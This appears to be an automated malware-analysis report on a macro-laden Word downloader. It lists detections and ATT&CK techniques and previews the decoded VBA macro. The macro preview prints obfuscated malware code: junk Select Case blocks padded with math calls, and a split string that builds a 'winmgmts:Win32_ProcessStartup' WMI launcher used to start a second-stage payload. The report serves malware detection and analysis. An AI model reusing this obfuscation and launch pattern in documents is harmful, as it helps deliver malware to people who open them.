MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro utilizes GetObject and CreateObject to launch a Win32_Process via WMI, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Sagent-6865730-0' further supports its downloader functionality.
Heuristics 8
-
ClamAV: Doc.Downloader.Sagent-6865730-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-6865730-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73920 bytes |
SHA-256: 543df201e154a7e5e149423ff87c08bc9efb8af544f2255ade6404ee982a999e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "d_55582"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "u578_35"
Function J_071_2()
Select Case D8__1942
Case 919821255
c3_81069 = Log(O46_531)
R46_902 = CDate(303006668)
G27_337 = Fix(134800971 + 490004281 + G3_7_46_ - Oct(690724736))
B51834 = Cos(167769966 - Sqr(827199426 - Atn(899264519)) - 390785565 + 571731060)
End Select
Select Case a276_51
Case 862525990
X5__3_9_ = Log(J4_3548)
T7_8_4 = CDate(844821985)
a1_0_123 = Fix(755522482 + 567295198 + X7905464 - Oct(59201586))
w0268_29 = Cos(357613928 - Sqr(763647121 - Atn(646615408)) - 379432067 + 760313778)
End Select
Select Case t182080_
Case 55459924
i_0037 = Log(j24757)
Z40_97 = CDate(957781610)
b_0_052 = Fix(245917534 + 574522705 + j88__7_ - Oct(771312551))
K074395 = Cos(413472210 - Sqr(710402810 - Atn(139800331)) - 802763884 + 839194534)
End Select
Select Case O_97_01
Case 909950347
j_46_0 = Log(R_667_)
W959728 = CDate(772975370)
J_5260 = Fix(116315584 + 321471410 + T580__2 - Oct(941022641))
N047479_ = Cos(847859673 - Sqr(572905860 - Atn(238966803)) - 463850504 + 577310050)
End Select
Select Case H76820
Case 232446402
R38013 = Log(N_0_69)
B51_12 = CDate(266239108)
d63_86 = Fix(612176945 + 333905745 + H67268_6 - Oct(746254369))
n__625 = Cos(207402843 - Sqr(478524385 - Atn(62240685)) - 227596899 + 928381140)
End Select
Select Case M88460_
Case 730606569
q_9287 = Log(f72811)
s972_731 = CDate(330096443)
W_901_ = Fix(91093977 + 723583660 + Y0573_3 - Oct(551401447))
Y46_341 = Cos(432854635 - Sqr(361071142 - Atn(562378402)) - 536506012 + 755021772)
End Select
Select Case X_456_4
Case 953822514
j01__09 = Log(w828538)
c9_8577_ = CDate(604708549)
S5326_ = Fix(634709857 + 158927921 + H110_167 - Oct(934254673))
Q6659258 = Cos(315109944 - Sqr(131473558 - Atn(63561632)) - 517596910 + 897692964)
End Select
End Function
Function O_272__5(u_77150, z2986_1)
On Error Resume Next
Select Case j44_906
Case 889628614
F58273 = Log(L8190__7)
t_97_0 = CDate(50222817)
F293_240 = Fix(305701092 + 567346086 + C2_1_518 - Oct(522291888))
S51260 = Cos(416674561 - Sqr(854002665 - Atn(65882325)) - 96496285 + 427295667)
End Select
Select Case m67379
Case 960835129
G_4_51 = Log(b_0__9)
h1_84856 = CDate(541114764)
B11780 = Fix(30517756 + 523410580 + U7305888 - Oct(380754407))
Z6_922_9 = Cos(569615878 - Sqr(836261759 - Atn(452526442)) - 789279759 + 22659213)
End Select
Select Case Y46_99
Case 114308441
Q_7__167 = Log(W_29__)
V92065 = CDate(54522447)
w09091_4 = Fix(189607205 + 32447166 + b78616 - Oct(64437251))
c_590_9 = Cos(670442440 - Sqr(452011817 - Atn(121285814)) - 686350208 + 32596726)
End Select
R97851_ = Q8__569_ + "winmgmts:Win32" + "_ProcessStartup" + t3845__5
Select Case B5_597
Case 196204263
k61_8633 = Log(n_6053_)
C21453 = CDate(274186804)
t6_584__ = Fix(454628749 + 8088369 + U92__599 - Oct(400765649))
I309030 = Cos(694984521 - Sqr(269326447 - Atn(781471853)) - 432758859 + 302360341)
End Select
Select Case P2__6_
Case 329189795
t904_92_ = Log(Y07_806)
Z8759087 = CDate(294901860)
s14212 = Fix(681219842 + 891963203 + q591_5 - Oct(841855981))
Q_90276 = Cos(233481
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.